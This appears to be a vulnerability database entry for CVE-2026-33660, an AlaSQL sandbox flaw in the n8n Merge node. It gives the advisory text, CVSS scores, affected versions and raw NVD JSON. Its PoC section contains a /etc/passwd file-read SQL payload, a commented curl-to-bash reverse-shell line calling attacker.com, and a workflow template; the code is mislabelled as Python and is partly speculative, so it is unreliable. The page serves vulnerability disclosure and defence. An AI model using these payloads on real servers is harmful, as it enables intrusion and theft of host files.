CVE-2026-33660

Description

n8n is an open source workflow automation platform. Prior to versions 2.14.1, 2.13.3, and 1.123.26, an authenticated user with permission to create or modify workflows could use the Merge node's "Combine by SQL" mode to read local files on the n8n host and achieve remote code execution. The AlaSQL sandbox did not sufficiently restrict certain SQL statements, allowing an attacker to access sensitive files on the server or even compromise the instance. The issue has been fixed in n8n versions 2.14.1, 2.13.3, and 1.123.26. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only, and/or disable the Merge node by adding `n8n-nodes-base.merge` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:n8n:n8n:2.14.0:*:*:*:*:node.js:*:* - VULNERABLE

n8n < 1.123.26

n8n < 2.13.3

n8n < 2.14.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-33660
// Description: Exploit the Merge Node's "Combine by SQL" mode to read local files.

// Step 1: Create a workflow in n8n with a Merge node.
// Step 2: Configure the Merge node to use "Combine by SQL" mode.
// Step 3: Inject the following SQL statement into the SQL input field.

// Malicious SQL to read /etc/passwd
const payload = "SELECT * FROM CSV('/etc/passwd')";

// Alternatively, if JavaScript execution is possible via AlaSQL sandbox escape:
// const payload = "SELECT * FROM TXT('$(curl http://attacker.com/rev.sh | bash)')";

// Example API payload structure
/*
{
  "nodes": [
    {
      "parameters": {
        "mode": "combineBySql",
        "sql": payload
      },
      "name": "Merge",
      "type": "n8n-nodes-base.merge",
      "typeVersion": 2.1,
      "position": [250, 300]
    }
  ]
}
*/

console.log(`Execute workflow with SQL: ${payload}`);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33660
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33660
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33660/
[4] VulDB https://vuldb.com/cve/CVE-2026-33660
[5] https://github.com/n8n-io/n8n/security/advisories/GHSA-58qr-rcgv-642v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33660", "sourceIdentifier": "[email protected]", "published": "2026-03-25T18:16:32.080", "lastModified": "2026-03-30T14:54:07.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to versions 2.14.1, 2.13.3, and 1.123.26, an authenticated user with permission to create or modify workflows could use the Merge node's \"Combine by SQL\" mode to read local files on the n8n host and achieve remote code execution. The AlaSQL sandbox did not sufficiently restrict certain SQL statements, allowing an attacker to access sensitive files on the server or even compromise the instance. The issue has been fixed in n8n versions 2.14.1, 2.13.3, and 1.123.26. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only, and/or disable the Merge node by adding `n8n-nodes-base.merge` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. Antes de las versiones 2.14.1, 2.13.3 y 1.123.26, un usuario autenticado con permiso para crear o modificar flujos de trabajo podría usar el modo 'Combine by SQL' del nodo Merge para leer archivos locales en el host de n8n y lograr ejecución remota de código. El sandbox de AlaSQL no restringía suficientemente ciertas sentencias SQL, permitiendo a un atacante acceder a archivos sensibles en el servidor o incluso comprometer la instancia. El problema ha sido solucionado en las versiones de n8n 2.14.1, 2.13.3 y 1.123.26. Los usuarios deben actualizar a una de estas versiones o posteriores para remediar la vulnerabilidad. Si la actualización no es posible de inmediato, los administradores deben considerar las siguientes mitigaciones temporales: Limitar los permisos de creación y edición de flujos de trabajo solo a usuarios de plena confianza, y/o deshabilitar el nodo Merge añadiendo `n8n-nodes-base.merge` a la variable de entorno `NODES_EXCLUDE`. Estas soluciones provisionales no remedian completamente el riesgo y solo deben usarse como medidas de mitigación a corto plazo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.123.27", "matchCriteriaId": "C5E7FBA6-35F5-426D-8BAA-25C7913A966A"}, {"vu ... (truncated)